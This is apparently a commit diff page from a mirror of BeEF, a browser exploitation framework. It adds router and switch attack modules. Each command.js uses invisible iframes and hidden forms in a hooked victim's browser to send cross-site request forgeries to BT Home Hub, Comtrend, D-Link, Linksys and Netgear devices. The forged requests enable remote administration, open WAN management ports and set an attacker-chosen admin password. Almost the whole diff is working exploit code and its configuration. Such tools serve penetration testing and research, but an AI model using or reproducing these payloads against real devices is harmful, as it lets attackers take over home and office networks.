Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Moved Router and Switch categories under Exploits category

Browse Source 
Added Social Engineering category
This commit is contained in:
bcoles
2012-05-20 18:32:44 +09:30
parent 56443cfdf4
commit 460b619cc1
36 changed files with 13 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

35
modules/exploits/router/bt_home_hub_csrf/command.js Normal file
View File

@@ -0,0 +1,35 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
[{'type':'hidden', 'name':'0', 'value':'31'} ,
{'type':'hidden', 'name':'1', 'value':''},
{'type':'hidden', 'name':'30', 'value':passwd}]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(bt_home_hub_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/bt_home_hub_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
bt_home_hub_csrf:
enable: true
category: ["Exploits","Router"]
name: "BT Home Hub CSRF"
description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
authors: ["bcoles"]
target:
working: ["ALL"]

29
modules/exploits/router/bt_home_hub_csrf/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Bt_home_hub_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

61
modules/exploits/router/comtrend_ct5367_csrf/command.js Normal file
View File

@@ -0,0 +1,61 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', gateway + "/password.cgi");
form.setAttribute('method', 'post');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'sptPassword');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'usrPassword');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'sysPassword');
input.setAttribute('value', passwd);
form.appendChild(input);
ct5367_iframe2.contentWindow.document.body.appendChild(form);
form.submit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(ct5367_iframe1);
document.body.removeChild(ct5367_iframe2);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/comtrend_ct5367_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
comtrend_ct5367_csrf:
enable: true
category: ["Exploits","Router"]
name: "Comtrend CT-5367 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
authors: ["bcoles"]
target:
working: ["ALL"]

29
modules/exploits/router/comtrend_ct5367_csrf/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Comtrend_ct5367_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

35
modules/exploits/router/comtrend_ct5624_csrf/command.js Normal file
View File

@@ -0,0 +1,35 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(ct5367_iframe1);
document.body.removeChild(ct5367_iframe2);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/comtrend_ct5624_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
comtrend_ct5624_csrf:
enable: true
category: ["Exploits","Router"]
name: "Comtrend CT-5624 CSRF"
description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
authors: ["bcoles"]
target:
working: ["ALL"]

29
modules/exploits/router/comtrend_ct5624_csrf/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Comtrend_ct5624_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

36
modules/exploits/router/dlink_dsl500t_csrf/command.js Normal file
View File

@@ -0,0 +1,36 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
{'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},
{'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dsl500t_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/dlink_dsl500t_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
dlink_dsl500t_csrf:
enable: true
category: ["Exploits","Router"]
name: "D-Link DSL500T CSRF"
description: "Attempts to change the password on a D-Link DSL500T router."
authors: ["bcoles"]
target:
working: ["ALL"]

29
modules/exploits/router/dlink_dsl500t_csrf/module.rb Normal file
View File

@@ -0,0 +1,29 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Dlink_dsl500t_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

28
modules/exploits/router/linksys_befsr41_csrf/command.js Normal file
View File

@@ -0,0 +1,28 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var befsr41_iframe = beef.dom.createInvisibleIframe();
befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(befsr41_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/linksys_befsr41_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
linksys_befsr41_csrf:
enable: true
category: ["Exploits","Router"]
name: "Linksys BEFSR41 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router."
authors: ["Martin Barbella"]
target:
working: ["ALL"]

30
modules/exploits/router/linksys_befsr41_csrf/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Linksys_befsr41_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

44
modules/exploits/router/linksys_wrt54g2_csrf/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
[{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
{'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
{'type':'hidden', 'name':'MANAGE_PASSWORDMOD', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_PASSWORD', 'value':passwd},
{'type':'hidden', 'name':'MANAGE_PASSWORD_CONFIRM', 'value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_WLFILTER', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_REMOTE', 'value':'1'},
{'type':'hidden', 'name':'MANAGE_PORT', 'value':port},
{'type':'hidden', 'name':'MANAGE_UPNP', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wrt54g2_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/linksys_wrt54g2_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
linksys_wrt54g2_csrf:
enable: true
category: ["Exploits","Router"]
name: "Linksys WRT54G2 CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router."
authors: ["Martin Barbella"]
target:
working: ["ALL"]

30
modules/exploits/router/linksys_wrt54g2_csrf/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Linksys_wrt54g2_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

44
modules/exploits/router/linksys_wrt54g_csrf/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var port = '<%= @port %>';
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
[{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'0'},
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
{'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
{'type':'hidden', 'name':'http_wanport', 'value':port},
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
{'type':'hidden', 'name':'layout', 'value':'en'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(wrt54g_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/router/linksys_wrt54g_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
linksys_wrt54g_csrf:
enable: true
category: ["Exploits","Router"]
name: "Linksys WRT54G CSRF"
description: "Attempts to enable remote administration and change the password on a Linksys WRT54G router."
authors: ["Martin Barbella"]
target:
working: ["ALL"]

30
modules/exploits/router/linksys_wrt54g_csrf/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Linksys_wrt54g_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

47
modules/exploits/switch/netgear_gs108t_csrf/command.js Normal file
View File

@@ -0,0 +1,47 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var oldpassword = '<%= @oldpassword %>';
var newpassword = '<%= @newpassword %>';
var gs_iframe = beef.dom.createInvisibleIframe();
gs_login = function() {
var d = new Date;
var rtime = (d.getTime() / 500);
gs_iframe.setAttribute('src', base+'login.cgi?passwd='+oldpassword+'&rtime='+rtime);
}
var gs108t_iframe = beef.dom.createInvisibleIframe();
gs_change_pwd = function() {
gs108t_iframe.setAttribute('src', base+'password.cgi?inputBox_oldPassword='+oldpassword+'&inputBox_newPassword='+newpassword+'&inputBox_retypeNewPassword='+newpassword);
}
//login to create the cookie
gs_login();
//wait some miliseconds and attempt to change the password
setTimeout("gs_change_pwd()", 500);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(gs108t_iframe);
document.body.removeChild(gs_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/switch/netgear_gs108t_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
Netgear_gs108t_csrf:
enable: true
category: ["Exploits","Switch"]
name: "Netgear GS108T CSRF"
description: "Attempts to change the password on a Netgear GS108T managed switch."
authors: ["Bart Leppens"]
target:
working: ["ALL"]

30
modules/exploits/switch/netgear_gs108t_csrf/module.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Netgear_gs108t_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://192.168.0.239/'},
{'name' => 'oldpassword', 'ui_label' => 'Old Password', 'value' => 'password'},
{'name' => 'newpassword', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end